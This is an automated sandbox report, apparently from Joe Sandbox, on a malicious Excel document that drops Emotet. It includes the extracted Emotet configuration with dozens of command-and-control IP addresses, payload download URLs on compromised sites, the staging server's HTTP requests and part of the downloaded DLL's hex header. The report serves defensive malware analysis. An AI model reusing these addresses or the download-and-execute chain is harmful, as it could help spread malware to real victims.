                            Source: http://ayoobeducationaltrust.in/cms/LmOOeDnNo0dh4vkN/PE3Avira URL Cloud: Label: malware
                            Source: http://bawelnianka.cfolks.pl/wp-content/Ttv/PE3Avira URL Cloud: Label: phishing
                            Source: http://test.valestudios.com/wp-content/aPvW7ApNbRY4ZGP/Avira URL Cloud: Label: malware
                            Source: http://91.240.118.168/vvv/ppp/fe.htmlhttp://91.240.118.168/vvv/ppp/fe.htmlAvira URL Cloud: Label: malware
                            Source: http://crm.compracasaenhouston.com/hs4d8a/c0s13I/Avira URL Cloud: Label: phishing
                            Source: http://91.240.118.168URL Reputation: Label: malware
                            Found malware configuration
                            Source: 11.2.rundll32.exe.200000.1.unpackMalware Configuration Extractor: Emotet {"C2 list": ["160.16.102.168:80", "131.100.24.231:80", "200.17.134.35:7080", "207.38.84.195:8080", "212.237.56.116:7080", "58.227.42.236:80", "104.251.214.46:8080", "158.69.222.101:443", "192.254.71.210:443", "46.55.222.11:443", "45.118.135.203:7080", "107.182.225.142:8080", "103.75.201.2:443", "104.168.155.129:8080", "195.154.133.20:443", "159.8.59.82:8080", "110.232.117.186:8080", "45.142.114.231:8080", "41.76.108.46:8080", "203.114.109.124:443", "50.116.54.215:443", "209.59.138.75:7080", "185.157.82.211:8080", "164.68.99.3:8080", "162.214.50.39:7080", "138.185.72.26:8080", "178.63.25.185:443", "51.15.4.22:443", "81.0.236.90:443", "216.158.226.206:443", "45.176.232.124:443", "162.243.175.63:443", "212.237.17.99:8080", "45.118.115.99:8080", "129.232.188.93:443", "173.214.173.220:8080", "178.79.147.66:8080", "176.104.106.96:8080", "51.38.71.0:443", "173.212.193.249:8080", "217.182.143.207:443", "212.24.98.99:8080", "159.89.230.105:443", "79.172.212.216:8080", "212.237.5.209:443"], "Public Key": ["RUNLMSAAAADzozW1Di4r9DVWzQpMKT588RDdy7BPILP6AiDOTLYMHkSWvrQO5slbmr1OvZ2Pz+AQWzRMggQmAtO6rPH7nyx2", "RUNTMSAAAABAX3S2xNjcDD0fBno33Ln5t71eii+mofIPoXkNFOX1MeiwCh48iz97kB0mJjGGZXwardnDXKxI8GCHGNl0PFj5"]}
                            Multi AV Scanner detection for submitted file
                            Source: 364453688149503140239183.xlsReversingLabs: Detection: 18%
                            Multi AV Scanner detection for domain / URL
                            Source: ayoobeducationaltrust.inVirustotal: Detection: 9%Perma Link
                            Source: http://cmit.valestudios.com/wp-admin/RueGJ41A/Virustotal: Detection: 12%Perma Link
                            Machine Learning detection for dropped file
                            Source: C:\ProgramData\QWER.dllJoe Sandbox ML: detected
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_10021854 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_10021854 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,

                            Software Vulnerabilities

                            barindex
                            Document exploit detected (process start blacklist hit)
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe
                            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 91.240.118.168:80
                            Source: global trafficDNS query: name: ayoobeducationaltrust.in
                            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 91.240.118.168:80

                            Networking

                            barindex
                            Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
                            Source: TrafficSnort IDS: 2034631 ET TROJAN Maldoc Activity (set) 192.168.2.22:49166 -> 91.240.118.168:80
                            C2 URLs / IPs found in malware configuration
                            Source: Malware configuration extractorIPs: 160.16.102.168:80
                            Source: Malware configuration extractorIPs: 131.100.24.231:80
                            Source: Malware configuration extractorIPs: 200.17.134.35:7080
                            Source: Malware configuration extractorIPs: 207.38.84.195:8080
                            Source: Malware configuration extractorIPs: 212.237.56.116:7080
                            Source: Malware configuration extractorIPs: 58.227.42.236:80
                            Source: Malware configuration extractorIPs: 104.251.214.46:8080
                            Source: Malware configuration extractorIPs: 158.69.222.101:443
                            Source: Malware configuration extractorIPs: 192.254.71.210:443
                            Source: Malware configuration extractorIPs: 46.55.222.11:443
                            Source: Malware configuration extractorIPs: 45.118.135.203:7080
                            Source: Malware configuration extractorIPs: 107.182.225.142:8080
                            Source: Malware configuration extractorIPs: 103.75.201.2:443
                            Source: Malware configuration extractorIPs: 104.168.155.129:8080
                            Source: Malware configuration extractorIPs: 195.154.133.20:443
                            Source: Malware configuration extractorIPs: 159.8.59.82:8080
                            Source: Malware configuration extractorIPs: 110.232.117.186:8080
                            Source: Malware configuration extractorIPs: 45.142.114.231:8080
                            Source: Malware configuration extractorIPs: 41.76.108.46:8080
                            Source: Malware configuration extractorIPs: 203.114.109.124:443
                            Source: Malware configuration extractorIPs: 50.116.54.215:443
                            Source: Malware configuration extractorIPs: 209.59.138.75:7080
                            Source: Malware configuration extractorIPs: 185.157.82.211:8080
                            Source: Malware configuration extractorIPs: 164.68.99.3:8080
                            Source: Malware configuration extractorIPs: 162.214.50.39:7080
                            Source: Malware configuration extractorIPs: 138.185.72.26:8080
                            Source: Malware configuration extractorIPs: 178.63.25.185:443
                            Source: Malware configuration extractorIPs: 51.15.4.22:443
                            Source: Malware configuration extractorIPs: 81.0.236.90:443
                            Source: Malware configuration extractorIPs: 216.158.226.206:443
                            Source: Malware configuration extractorIPs: 45.176.232.124:443
                            Source: Malware configuration extractorIPs: 162.243.175.63:443
                            Source: Malware configuration extractorIPs: 212.237.17.99:8080
                            Source: Malware configuration extractorIPs: 45.118.115.99:8080
                            Source: Malware configuration extractorIPs: 129.232.188.93:443
                            Source: Malware configuration extractorIPs: 173.214.173.220:8080
                            Source: Malware configuration extractorIPs: 178.79.147.66:8080
                            Source: Malware configuration extractorIPs: 176.104.106.96:8080
                            Source: Malware configuration extractorIPs: 51.38.71.0:443
                            Source: Malware configuration extractorIPs: 173.212.193.249:8080
                            Source: Malware configuration extractorIPs: 217.182.143.207:443
                            Source: Malware configuration extractorIPs: 212.24.98.99:8080
                            Source: Malware configuration extractorIPs: 159.89.230.105:443
                            Source: Malware configuration extractorIPs: 79.172.212.216:8080
                            Source: Malware configuration extractorIPs: 212.237.5.209:443
                            Source: global trafficHTTP traffic detected: GET /vvv/ppp/fe.png HTTP/1.1Host: 91.240.118.168Connection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /cms/LmOOeDnNo0dh4vkN/ HTTP/1.1Host: ayoobeducationaltrust.inConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 28 Jan 2022 20:28:51 GMTServer: ApacheSet-Cookie: 61f4520308e3e=1643401731; expires=Fri, 28-Jan-2022 20:29:51 GMT; Max-Age=60; path=/Cache-Control: no-cache, must-revalidatePragma: no-cacheLast-Modified: Fri, 28 Jan 2022 20:28:51 GMTExpires: Fri, 28 Jan 2022 20:28:51 GMTContent-Disposition: attachment; filename="xfm.dll"Content-Transfer-Encoding: binaryContent-Length: 548864Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 68 73 c2 61 2c 12 ac 32 2c 12 ac 32 2c 12 ac 32 ef 1d f3 32 26 12 ac 32 ef 1d f1 32 37 12 ac 32 2c 12 ad 32 0e 10 ac 32 0b d4 d1 32 36 12 ac 32 0b d4 c1 32 a6 12 ac 32 0b d4 c2 32 b2 12 ac 32 0b d4 d6 32 2d 12 ac 32 0b d4 d0 32 2d 12 ac 32 0b d4 d4 32 2d 12 ac 32 52 69 63 68 2c 12 ac 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 3e fa f3 61 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 08 00 00 50 04 00 00 00 04 00 00 00 00 00 06 0d 03 00 00 10 00 00 00 60 04 00 00 00 00 10 00 10 00 00 00 10 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 a0 08 00 00 10 00 00 98 df 08 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 40 2d 05 00 52 00 00 00 34 10 05 00 04 01 00 00 00 a0 05 00 50 56 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 00 30 4e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 bd 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 60 04 00 94 05 00 00 ac 0f 05 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 39 45 04 00 00 10 00 00 00 50 04 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 92 cd 00 00 00 60 04 00 00 d0 00 00 00 60 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 80 65 00 00 00 30 05 00 00 30 00 00 00 30 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 50 56 02 00 00 a0 05 00 00 60 02 00 00 60 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 62 93 00 00 00 00 08 00 00 a0 00 00 00 c0 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ
                            Source: global trafficHTTP traffic detected: GET /vvv/ppp/fe.html HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 91.240.118.168Connection: Keep-Alive
                            Source: Joe Sandbox ViewASN Name: OnlineSASFR OnlineSASFR
                            Source: Joe Sandbox ViewASN Name: S-NET-ASPL S-NET-ASPL
                            Source: Joe Sandbox ViewIP Address: 195.154.133.20 195.154.133.20
                            Source: Joe Sandbox ViewIP Address: 185.157.82.211 185.157.82.211
                            Source: unknownNetwork traffic detected: IP country count 22
                            Source: 364453688149503140239183.xls.0.drString found in binary or memory: http://91.2
                            Source: powershell.exe, 00000006.00000002.685495264.000000000360E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.240.11
                            Source: powershell.exe, 00000006.00000002.685495264.000000000360E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.685627129.0000000003765000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.240.118.168
                            Source: powershell.exe, 00000006.00000002.685495264.000000000360E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.240.118.168/vvv/ppp/fe
                            Source: mshta.exe, 00000004.00000002.448998828.00000000005B1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.448869103.00000000004E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.424683366.00000000005B1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.424658641.0000000000578000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.448904152.000000000053B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.447450916.0000000000597000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.424268800.0000000003400000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.240.118.168/vvv/ppp/fe.html
                            Source: mshta.exe, 00000004.00000003.447483240.00000000005B1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.448998828.00000000005B1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.424683366.00000000005B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.240.118.168/vvv/ppp/fe.html17
                            Source: mshta.exe, 00000004.00000003.447334668.0000000000536000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.447356395.000000000053E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.448911645.0000000000542000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.240.118.168/vvv/ppp/fe.html3
                            Source: mshta.exe, 00000004.00000002.448978311.0000000000598000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.424658641.0000000000578000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.447450916.0000000000597000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.240.118.168/vvv/ppp/fe.htmlC:
                            Source: mshta.exe, 00000004.00000002.448869103.00000000004E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.240.118.168/vvv/ppp/fe.htmlWinSta0
                            Source: mshta.exe, 00000004.00000003.426307315.000000000320D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.240.118.168/vvv/ppp/fe.htmlfunction
                            Source: mshta.exe, 00000004.00000003.426086113.0000000003205000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.240.118.168/vvv/ppp/fe.htmlhttp://91.240.118.168/vvv/ppp/fe.html
                            Source: mshta.exe, 00000004.00000002.448869103.00000000004E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.240.118.168/vvv/ppp/fe.htmlmshta
                            Source: mshta.exe, 00000004.00000003.447483240.00000000005B1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.448998828.00000000005B1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.424683366.00000000005B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.240.118.168/vvv/ppp/fe.htmlv1.0
                            Source: powershell.exe, 00000006.00000002.685495264.000000000360E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.690418906.000000001B4AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.240.118.168/vvv/ppp/fe.png
                            Source: powershell.exe, 00000006.00000002.685495264.000000000360E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.240.118.168/vvv/ppp/fe.pngPE3
                            Source: powershell.exe, 00000006.00000002.685627129.0000000003765000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ayoobeducationaltrust.in
                            Source: powershell.exe, 00000006.00000002.685627129.0000000003765000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ayoobeducationaltrust.in/
                            Source: powershell.exe, 00000006.00000002.685627129.0000000003765000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ayoobeducationaltrust.in/cms/LmOOeDnNo0dh4vkN/
                            Source: powershell.exe, 00000006.00000002.685627129.0000000003765000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ayoobeducationaltrust.in/cms/LmOOeDnNo0dh4vkN/PE3
                            Source: powershell.exe, 00000006.00000002.685627129.0000000003765000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://bawelnianka.cfolks.pl/wp-
                            Source: powershell.exe, 00000006.00000002.685627129.0000000003765000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://bawelnianka.cfolks.pl/wp-content/Ttv/
                            Source: powershell.exe, 00000006.00000002.685627129.0000000003765000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://bawelnianka.cfolks.pl/wp-content/Ttv/PE3
                            Source: powershell.exe, 00000006.00000002.685627129.0000000003765000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cmit.vale
                            Source: powershell.exe, 00000006.00000002.685627129.0000000003765000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cmit.valestudios.com/wp-a
                            Source: powershell.exe, 00000006.00000002.685627129.0000000003765000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cmit.valestudios.com/wp-admin/RueGJ41A/
                            Source: powershell.exe, 00000006.00000002.685627129.0000000003765000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cmit.valestudios.com/wp-admin/RueGJ41A/PE3
                            Source: powershell.exe, 00000006.00000002.685627129.0000000003765000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crm.compr
                            Source: powershell.exe, 00000006.00000002.685627129.0000000003765000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crm.compracasaenhouston.c
                            Source: powershell.exe, 00000006.00000002.685627129.0000000003765000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crm.compracasaenhouston.com/hs4d8a/c0s13I/
                            Source: powershell.exe, 00000006.00000002.685627129.0000000003765000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crm.compracasaenhouston.com/hs4d8a/c0s13I/PE3
                            Source: powershell.exe, 00000006.00000002.685627129.0000000003765000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://curvygirlsboutique.com/jf
                            Source: powershell.exe, 00000006.00000002.685627129.0000000003765000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://curvygirlsboutique.com/jfertl/Ge49zcIzb8KWwXFFk/
                            Source: powershell.exe, 00000006.00000002.685627129.0000000003765000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://curvygirlsboutique.com/jfertl/Ge49zcIzb8KWwXFFk/PE3
                            Source: powershell.exe, 00000006.00000002.685627129.0000000003765000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://huculek.f
                            Source: powershell.exe, 00000006.00000002.685627129.0000000003765000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://huculek.futurehost.pl/ima
                            Source: powershell.exe, 00000006.00000002.685627129.0000000003765000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://huculek.futurehost.pl/images/6Dbbmo6xEQDD/
                            Source: powershell.exe, 00000006.00000002.685627129.0000000003765000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://huculek.futurehost.pl/images/6Dbbmo6xEQDD/PE3
                            Source: powershell.exe, 00000006.00000002.685627129.0000000003765000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://lynsmithgroup.com/hftm2i2
                            Source: powershell.exe, 00000006.00000002.685627129.0000000003765000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://lynsmithgroup.com/hftm2i2/KZIFwjmwWI1sy/
                            Source: powershell.exe, 00000006.00000002.685627129.0000000003765000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://lynsmithgroup.com/hftm2i2/KZIFwjmwWI1sy/PE3
                            Source: powershell.exe, 00000006.00000002.685627129.0000000003765000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://sellin.ap
                            Source: powershell.exe, 00000006.00000002.685627129.0000000003765000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://sellin.app/wp-admin/S2cDP
                            Source: powershell.exe, 00000006.00000002.685627129.0000000003765000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://sellin.app/wp-admin/S2cDPYXNKEnT/
                            Source: powershell.exe, 00000006.00000002.685627129.0000000003765000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://sellin.app/wp-admin/S2cDPYXNKEnT/PE3
                            Source: powershell.exe, 00000006.00000002.685627129.0000000003765000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://test.drea
                            Source: powershell.exe, 00000006.00000002.685627129.0000000003765000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://test.dreamcityorlando.com
                            Source: powershell.exe, 00000006.00000002.685627129.0000000003765000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://test.dreamcityorlando.com/t0mmx/xBBXi/
                            Source: powershell.exe, 00000006.00000002.685627129.0000000003765000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://test.dreamcityorlando.com/t0mmx/xBBXi/PE3
                            Source: powershell.exe, 00000006.00000002.685627129.0000000003765000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://test.vale
                            Source: powershell.exe, 00000006.00000002.685627129.0000000003765000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://test.valestudios.com/wp-c
                            Source: powershell.exe, 00000006.00000002.685627129.0000000003765000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://test.valestudios.com/wp-content/aPvW7ApNbRY4ZGP/
                            Source: powershell.exe, 00000006.00000002.685627129.0000000003765000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://test.valestudios.com/wp-content/aPvW7ApNbRY4ZGP/PE3
                            Source: powershell.exe, 00000006.00000002.685627129.0000000003765000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://thesocialagent.net/b/MO5A
                            Source: powershell.exe, 00000006.00000002.685627129.0000000003765000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://thesocialagent.net/b/MO5AKqJ9Ty9lE/
                            Source: powershell.exe, 00000006.00000002.685627129.0000000003765000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://thesocialagent.net/b/MO5AKqJ9Ty9lE/PE3
                            Source: powershell.exe, 00000006.00000002.679285787.00000000000B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.piriform.com/ccleaner
                            Source: powershell.exe, 00000006.00000002.679285787.00000000000B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
                            Source: mshta.exe, 00000004.00000003.424599420.00000000033D4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.424268800.0000000003400000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.447384053.00000000033C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.protware.com
                            Source: mshta.exe, 00000004.00000003.424245582.000000000346D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.449466418.0000000003EAB000.00000004.00000010.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.424110567.00000000033F8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.424721967.0000000003407000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.444232743.000000000346D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.449284684.000000000340B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.449350682.000000000346D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.425017595.0000000003408000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.424268800.0000000003400000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.protware.com/
                            Source: rundll32.exe, 00000011.00000002.679244747.000000000069A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://160.16.102.168:80/gYIhzp
                            Source: rundll32.exe, 00000011.00000002.679244747.000000000069A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://160.16.102.168:80/gYIhzpA
                            Source: rundll32.exe, 00000011.00000002.679438448.00000000006D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://160.16.102.168:80/gYIhzpB
                            Source: rundll32.exe, 00000011.00000002.679438448.00000000006D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://160.16.102.168:80/gYIhzpH
                            Source: rundll32.exe, 00000011.00000002.679244747.000000000069A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://160.16.102.168:80/gYIhzpK
                            Source: rundll32.exe, 00000011.00000002.679438448.00000000006D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://160.16.102.168:80/gYIhzpz
                            Source: C:\Windows\System32\mshta.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\fe[1].htmJump to behavior
                            Source: unknownDNS traffic detected: queries for: ayoobeducationaltrust.in
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_10012C30 _memset,connect,_strcat,send,recv,
                            Source: global trafficHTTP traffic detected: GET /vvv/ppp/fe.html HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 91.240.118.168Connection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /vvv/ppp/fe.png HTTP/1.1Host: 91.240.118.168Connection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /cms/LmOOeDnNo0dh4vkN/ HTTP/1.1Host: ayoobeducationaltrust.inConnection: Keep-Alive
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.240.118.168
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.240.118.168
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.240.118.168
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.240.118.168
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.240.118.168
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.240.118.168
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.240.118.168
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.240.118.168
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.240.118.168
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.240.118.168
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.240.118.168
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.240.118.168
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.240.118.168
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.240.118.168
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.240.118.168
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.240.118.168
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.240.118.168
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.240.118.168
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.240.118.168
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.240.118.168
                            Source: mshta.exe, 00000004.00000003.424627198.000000000054C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.448920352.000000000054C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: /moc.nideknil.wwwwww.linkedin.com equals www.linkedin.com (Linkedin)
                            Source: mshta.exe, 00000004.00000003.424627198.000000000054C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.448920352.000000000054C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_1001B43F GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA,
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_1001B43F GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA,
                            Source: C:\Windows\System32\mshta.exeWindow created: window name: CLIPBRDWNDCLASS

                            E-Banking Fraud

                            barindex
                            Yara detected Emotet
                            Source: Yara matchFile source: 12.2.rundll32.exe.2a0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.170000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 11.2.rundll32.exe.200000.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.2e90000.16.unpack, type: UNPACKEDPE
